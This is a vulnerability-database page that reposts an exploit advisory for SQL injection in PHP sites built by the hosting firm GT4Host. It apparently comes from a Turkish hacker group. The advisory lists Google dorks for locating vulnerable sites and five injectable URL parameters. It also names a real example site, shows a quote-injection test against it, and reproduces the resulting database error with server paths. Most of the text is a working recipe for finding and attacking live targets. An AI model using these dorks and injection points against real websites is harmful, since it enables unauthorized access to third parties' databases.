Middle East Design and Programming GT4Host.Com Hosting SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034866 漏洞类型
发布时间 2018-06-01 更新时间 2018-06-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060010
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Middle East Design and Programming GT4Host.Com Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 01/06/2018
# Vendor Homepage : GT4Host.Com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork 1 : intext:''جميع الحقوق محفوظة لدَتك الدولية لجودة التدريب - الشرق الأوسط''

# Google Dork 2 : intext:''الشرق الأوسطتصميم وبرمجة GT4Host''

# Exploit : /organizationworker.php?organizationid=[SQL Injection]

# Exploit : /coworker.php?teammemberid=[SQL Injection]

# Exploit : /month.php?monthid=[SQL Injection]

# Exploit : /subprogram.php?coursecatid=[SQL Injection]

# Exploit :  /aboutus.php?id=[SQL Injection]

#################################################################################################

# Example Site =>  datc-bd.com/controllers/aboutus.php?id=1%27 => [ Proof of Concept of SQL Inj ] => archive.is/k2IQg

# SQL-DB Error => 

Fatal error: Uncaught exception 'Exception' with message '1' is not a number' in /home/dtcgt4ho/public_html/models/sql/SqlQuery.class.php:55 
Stack trace: #0 /home/dtcgt4ho/public_html/models/mysql/PagesMySqlDAO.class.php(19): SqlQuery->setNumber('1'') #1 
/home/dtcgt4ho/public_html/controllers/aboutus.php(171): 
PagesMySqlDAO->load('1'') #2 /home/dtcgt4ho/public_html/controllers/aboutus.php(124): aboutusdata() #3 {main} thrown in 
/home/dtcgt4ho/public_html/models/sql/SqlQuery.class.php on line 55

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team [ Turkish Moslem Hackers ]

#################################################################################################